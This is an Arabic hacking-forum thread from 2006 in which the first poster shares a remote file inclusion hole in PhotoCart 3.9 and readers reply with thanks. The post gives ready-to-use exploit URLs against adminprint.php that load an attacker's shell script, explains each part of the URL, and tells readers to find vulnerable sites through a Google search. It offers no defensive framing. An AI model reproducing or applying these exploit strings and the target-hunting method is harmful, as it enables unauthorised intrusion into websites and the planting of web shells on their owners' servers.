المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ثغره في نظام photocart


الكفن الاسود
11-21-2006, 07:38 PM
السلام عليكم
اقم لكم ثغره في نظام photocart
الثغره من نوع remote file include
ويمكن التعامل معها بسهوله تابع الطريقه
هناك طريقتين للاستغلال
/PhotoCart/adminprint.php?admin_folder=[evil_scripts]
http://www.site.com/PhotoCart/adminprint.php?path=[evil_scripts]
...................................
http://www.site.com
اسم الموقع
PhotoCart
اسم النظام او المجله
adminprint.php?path
اسم الملف المصاب مع امر الاستغلال
evil_scripts
لينك الشيل هنا
وللبحث عن الثغره ادخل موقع
www.google.com
وضع في محرك البحث
PhotoCart 3.9
تحياتي للجميغ جميع حقوق الترجمه محفوظه ل:الكفن الاسود
مكتشف الثغره هو :
irvian

ZaMorANo
11-22-2006, 08:03 AM
شكرا يا امير ,,

الصيدلي
11-22-2006, 06:43 PM
بصراحه ما فهمت شي

alhasas
12-29-2006, 02:31 AM
شكرا ياغالي الله يعطيك العافية